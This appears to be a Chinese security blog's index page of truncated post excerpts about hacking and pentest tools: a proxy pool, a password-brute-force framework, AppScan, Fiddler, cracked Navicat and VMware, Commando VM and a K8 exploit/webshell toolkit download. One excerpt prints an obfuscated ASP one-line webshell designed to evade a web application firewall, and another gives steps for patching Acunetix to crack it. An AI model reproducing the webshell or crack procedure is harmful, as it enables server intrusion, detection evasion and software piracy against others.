Proxy_Pool代理资源池，一个小巧的代理ip抓取+评估+存储+展示的一体化的工具，可自动化的搜集检测可用代理并进行评分，并添加了Web展示和接口。安装1、从GitHub上拖下来gitclonehttps://github.com/TideSec/Proxy_Pool2、在mysql中新建数据库proxy，将proxy.sql文件导入，在include/config.inc.php中修改数据库…

密码破解脚本调用框架，目前支持密文，文件，服务和应用等类型的20种密码破解。一、简介该项目主要解决以下问题问题解决一些自定义算法，不常用的文件，冷门的服务如何爆破？支持自定义插件编写python的爆破脚本很多，特别零散，如何把它们集合到一起？将其核心爆破功能编写成插件，由框架统一调用编译型的爆破工具，在爆破过程中莫名失败，如何调试？可以临时修改脚本输出调式目前工具的优势和缺陷，请各位根据其特点。自…

IBMAppScan是一款非常好用且功能强大的Web应用安全测试工具，曾以WatchfireAppScan的名称享誉业界，RationalAppScan可自动化Web应用的安全漏洞评估工作，能扫描和检测所有常见的Web应用安全漏洞，例如SQL注入（SQL-injection）、跨站点脚本攻击（cross-sitescripting）、缓冲区溢出（bufferoverflow）及最新的Flash/F…

破解方法：使用方法：下载安装原版demo，安装完之后先登录awvs网页后台，确保demo版已经激活，然后把patch_awvs放到扫描器执行文件目录（例如：/home/acunetix/.acunetix_trial/v_190409112/scanner/），然后以root权限运行patch_awvs chmod-R777/home/acunetix/.acunetix_trial/v…

发现有些思路很好的webshell已经被特征了稍微改改就好了asp过狗一句话↓原马儿eXecUTe(fun("%167%184%163%174%98%180%167%179%183%167%181%182%106%100%142%163%176%166%137%180%167%187%100%107"))Functionfun(Str):Str=Split(Str,"%")Forx=1T…

Fiddler是一个http协议调试代理工具，它能够记录并检查所有你的电脑和互联网之间的http通讯，设置断点，查看所有的“进出”Fiddler的数据（指cookie,html,js,css等文件）。Fiddler要比其他的网络调试器要更加简单，因为它不仅仅暴露http通讯还提供了一个用户友好的格式。Fiddler是用C#写出来的,它包含一个简单却功能强大的基于JScrip…

新版居然支持MongoDB了！NavicatPremium是一套数据库管理工具，让你以单一程序同時连接到MySQL、MariaDB、SQLServer、SQLite、Oracle和PostgreSQL数据库。此外，它与Drizzle、OurDelta和PerconaServer兼容，并支持AmazonRDS、AmazonAurora、AmazonRedshift、SQLAzure、OracleCl…

VMwareWorkstation15破解版是一款最先进的虚拟化软件，为各类用户设计的桌面虚拟化解决方案。使技术专业人员能够通过在同一台PC上同时运行多个基于x86的Windows，Linux和其他操作系统来开发，测试，演示和部署软件。您可以在虚拟机中复制服务器，桌面和平板电脑环境，并为每个虚拟机分配多个处理器核心，千兆字节的主内存和图形内存，无论虚拟机位于个人PC还是私有企业云上。VMwareW…

2019年3月28日，火眼发布了一个包含超过140个开源Windows渗透工具包，红队渗透测试员和蓝队防御人员均拥有了顶级侦察与漏洞利用程序集。该工具集名为“CommandoVM”。安全工作者在对系统环境进行渗透测试时常常会自己配置虚拟机，如果是Linux的话还好，还有KaliLinux可以用。但是碰上Windows环境就惨了，往往配置虚拟机环境就要好几个小时。一边要维护自…

k8工具集分享k8工具下载远程溢出提权渗透工具打包下载地址：https://github.com/k8gege/K8tools/archive/master.zip内网渗透/提权工具/远程溢出/漏洞利用Exploit/APT/0day/Shellcode/Payload/priviledge/OverFlow/WebShell/PenTestPS:不定期更新,文件比较大，可按需下载。工具BUG或建…